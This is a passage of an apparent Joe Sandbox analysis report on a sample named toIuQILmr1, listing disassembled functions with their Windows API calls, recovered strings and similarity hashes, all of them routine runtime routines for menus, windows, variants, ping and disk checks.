                                          Function 00DD21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • GetSysColor.USER32(0000000F), ref: 00DD21D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 4c1cf165fefb5ec342fa7ed46a35bae31baff1d7db571760da32971a24873044
                                          • Instruction ID: 7cf06800af3bf099daed9bc62cdd47d57bb60db27202afe3e3fe25a34df0ea14
                                          • Opcode Fuzzy Hash: 4c1cf165fefb5ec342fa7ed46a35bae31baff1d7db571760da32971a24873044
                                          • Instruction Fuzzy Hash: 0B41D3310056409FDB255F28DC88BB93B75EB16332F284366FDA59A2E2C7318C82DB75
                                          Function 00E3AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,00E5F910), ref: 00E3AB76
                                          • GetDriveTypeW.KERNEL32(00000061,00E8A620,00000061), ref: 00E3AC40
                                          • _wcscpy.LIBCMT ref: 00E3AC6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: b0075578f9b9416811bfddf489e11cc16e1592f3e9ceae193d79038985e4a185
                                          • Instruction ID: fa8e7483629fa24df47dfda6210836db4f0d310520ed3e0baf224d1ae9aad79d
                                          • Opcode Fuzzy Hash: b0075578f9b9416811bfddf489e11cc16e1592f3e9ceae193d79038985e4a185
                                          • Instruction Fuzzy Hash: 0751A1311083059FC714EF14C895AAAFBA5EF81304F58682EF5D6672A2DB31DD89CB63
                                          Function 00DD9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 139cd1635471e4841f557d08710151ffc94ae8d4a58a4e69237ca65030fb3ecf
                                          • Instruction ID: 688ab3e5a61bfc8f290a407b878e6de51a83d2891c9b5ea4edf16a5165c05735
                                          • Opcode Fuzzy Hash: 139cd1635471e4841f557d08710151ffc94ae8d4a58a4e69237ca65030fb3ecf
                                          • Instruction Fuzzy Hash: CA41F571604209AADB34AB74DC52E76B7E8EF44304F24546FE689E7291EA32D941CB31
                                          Function 00E573C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E573D9
                                          • CreateMenu.USER32 ref: 00E573F4
                                          • SetMenu.USER32(?,00000000), ref: 00E57403
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E57490
                                          • IsMenu.USER32(?), ref: 00E574A6
                                          • CreatePopupMenu.USER32 ref: 00E574B0
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E574DD
                                          • DrawMenuBar.USER32 ref: 00E574E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 414aa0e9976a2b67066082eb7fc940092b80799ad86ba4da69ea3813ac04ec90
                                          • Instruction ID: b611db633722ca590f0d53411655a571fced53c6c8be821aeb423316078b9852
                                          • Opcode Fuzzy Hash: 414aa0e9976a2b67066082eb7fc940092b80799ad86ba4da69ea3813ac04ec90
                                          • Instruction Fuzzy Hash: 0A416A74A00205EFDB24DF65E884E9ABBB5FF49346F14482AED55A7350D730AD28CB60
                                          Function 00E5772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E577CD
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00E577D4
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E577E7
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E577EF
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E577FA
                                          • DeleteDC.GDI32(00000000), ref: 00E57803
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00E5780D
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E57821
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E5782D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: 47dbb414834a65e51a7e19e5ec450d5ed28b7268ac6016f4e631ebfb47587a0d
                                          • Instruction ID: e5788ce72d5241246046454fca7542450dfa28061bb8dd62fa10ce93bfb33887
                                          • Opcode Fuzzy Hash: 47dbb414834a65e51a7e19e5ec450d5ed28b7268ac6016f4e631ebfb47587a0d
                                          • Instruction Fuzzy Hash: F231AC31101214AFDF169FA5EC08FDB3B69EF0D326F100A25FA55B20A0C731D829DBA4
                                          Function 00DF7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00DF707B
                                            • Part of subcall function 00DF8D68: __getptd_noexit.LIBCMT ref: 00DF8D68
                                          • __gmtime64_s.LIBCMT ref: 00DF7114
                                          • __gmtime64_s.LIBCMT ref: 00DF714A
                                          • __gmtime64_s.LIBCMT ref: 00DF7167
                                          • __allrem.LIBCMT ref: 00DF71BD
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF71D9
                                          • __allrem.LIBCMT ref: 00DF71F0
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF720E
                                          • __allrem.LIBCMT ref: 00DF7225
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF7243
                                          • __invoke_watson.LIBCMT ref: 00DF72B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                          • Instruction ID: 1116f3b7d783211d8ee22a7eac6c17097e3eb1710324244a92387119eaacdb6d
                                          • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                          • Instruction Fuzzy Hash: DC71BA71A0471BABE7149E79CC417BAB3F8BF14324F19822AF614E66C1EB70D95087B4
                                          Function 00E32A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E32A31
                                          • GetMenuItemInfoW.USER32(00E96890,000000FF,00000000,00000030), ref: 00E32A92
                                          • SetMenuItemInfoW.USER32(00E96890,00000004,00000000,00000030), ref: 00E32AC8
                                          • Sleep.KERNEL32(000001F4), ref: 00E32ADA
                                          • GetMenuItemCount.USER32(?), ref: 00E32B1E
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E32B3A
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00E32B64
                                          • GetMenuItemID.USER32(?,?), ref: 00E32BA9
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E32BEF
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E32C03
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E32C24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 661c3c411d1fbfd505da3dec6eade161e6b042cf74948fe3fe6adc1a1dc0fe56
                                          • Instruction ID: d6a375bc15e032d3c3ef94788e7e7809c8f8d03a1a953d9170ec8f00689f3710
                                          • Opcode Fuzzy Hash: 661c3c411d1fbfd505da3dec6eade161e6b042cf74948fe3fe6adc1a1dc0fe56
                                          • Instruction Fuzzy Hash: DB618FB0900249AFDB21CF64D88CDBEBFB8EB41348F14555EEA81B7251E731AD45DB21
                                          Function 00E57192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E57214
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E57217
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E5723B
                                          • _memset.LIBCMT ref: 00E5724C
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E5725E
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E572D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: 59d819537ecbcca75730b93416811ccd37fe8f72093a732cb15af42a2fb404ee
                                          • Instruction ID: 5b4ab318b086ce7fee4a5190f608984885fdabb1181b10d1eeb56addc642a466
                                          • Opcode Fuzzy Hash: 59d819537ecbcca75730b93416811ccd37fe8f72093a732cb15af42a2fb404ee
                                          • Instruction Fuzzy Hash: 39617A71900208AFDB20DFA4CC81EEE77F8AB09714F14455AFE54A72A1C770AE59DBA0
                                          Function 00E2710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E27135
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00E2718E
                                          • VariantInit.OLEAUT32(?), ref: 00E271A0
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E271C0
                                          • VariantCopy.OLEAUT32(?,?), ref: 00E27213
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E27227
                                          • VariantClear.OLEAUT32(?), ref: 00E2723C
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00E27249
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E27252
                                          • VariantClear.OLEAUT32(?), ref: 00E27264
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E2726F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: c0394e94cb695e68c7026422ab1feee14107a52e2f12007a6417149011a2b2c2
                                          • Instruction ID: 7d5ec3af100c8a66ce172670ca77e78a0462649b486adc50d972264fc5e6e09e
                                          • Opcode Fuzzy Hash: c0394e94cb695e68c7026422ab1feee14107a52e2f12007a6417149011a2b2c2
                                          • Instruction Fuzzy Hash: C2415E75A04229EFCF04EF65D844DAEBBB8FF08355F009469F955B7261CB30A949CBA0
                                          Function 00E49428 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 263COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                          • API String ID: 2862541840-1765764032
                                          • Opcode ID: 920aba4c0e87c6f1c9990f81af58f034d28dbef3e94ff1709615866eba5bc65d
                                          • Instruction ID: 2838bff7bbc4e7216e7251e79ca83912f8070cda939e1c7a5b3020afe400d1f1
                                          • Opcode Fuzzy Hash: 920aba4c0e87c6f1c9990f81af58f034d28dbef3e94ff1709615866eba5bc65d
                                          • Instruction Fuzzy Hash: 4E91AD71A00219AFDF24DFA5E844FAFBBB8EF85314F109159F519BB281D7709905CBA0
                                          Function 00E45A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WS2_32(00000101,?), ref: 00E45AA6
                                          • inet_addr.WS2_32(?), ref: 00E45AEB
                                          • gethostbyname.WS2_32(?), ref: 00E45AF7
                                          • IcmpCreateFile.IPHLPAPI ref: 00E45B05
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E45B75
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E45B8B
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E45C00
                                          • WSACleanup.WS2_32 ref: 00E45C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 191cea79a81da25241c326e478514e623b2efee945a17658e5c787d1336c0e1d
                                          • Instruction ID: 2be9837fab2d5deac0e0cf1dd5c22cffa2eb739e1f52b317cd884116fbbf9bcd
                                          • Opcode Fuzzy Hash: 191cea79a81da25241c326e478514e623b2efee945a17658e5c787d1336c0e1d
                                          • Instruction Fuzzy Hash: 3F5190326047009FD711AF25EC45B6ABBE4EF48714F14992AF555EB2A2DB70EC04CF61
                                          Function 00DE62F2 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 143COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • argument not compiled in 16 bit mode, xrefs: 00E21150
                                          • argument is not a compiled regular expression, xrefs: 00E21160
                                          • internal error: opcode not recognized, xrefs: 00DE647D
                                          • failed to get memory, xrefs: 00DE6488
                                          • ERCP, xrefs: 00DE6313
                                          • internal error: missing capturing bracket, xrefs: 00E21158
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP$argument is not a compiled regular expression$argument not compiled in 16 bit mode$failed to get memory$internal error: missing capturing bracket$internal error: opcode not recognized
                                          • API String ID: 2532777613-264027815
                                          • Opcode ID: 86ae316a3def4513b5a2651ad744cedc0c69f9cfdd0033f7ec72188ca028251f
                                          • Instruction ID: aa4f9046539cfecaf3ef37b95744aca68d7e92bbc86031f7921b42c00e9015a9
                                          • Opcode Fuzzy Hash: 86ae316a3def4513b5a2651ad744cedc0c69f9cfdd0033f7ec72188ca028251f
                                          • Instruction Fuzzy Hash: 3D5102719003499BCB24DF66C8817AABBF4EF14354F24856EE94AD7281E731E680CB60
                                          Function 00E3B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E3B73B
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E3B7B1
                                          • GetLastError.KERNEL32 ref: 00E3B7BB
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00E3B828
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 004af9325c4e9cf3795520c1937903539eb1dd4c1b759bde2989ca5dfa956402
                                          • Instruction ID: ca4511472645a10aa58ed737806d88d40ab5b8ccfaa84a0ef3c6158d537c8654
                                          • Opcode Fuzzy Hash: 004af9325c4e9cf3795520c1937903539eb1dd4c1b759bde2989ca5dfa956402
                                          • Instruction Fuzzy Hash: EA319235A00205AFDB04EF64C889AEEBBB4EF84704F14516BF606F7291DB719946CB61
                                          Function 00E29471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
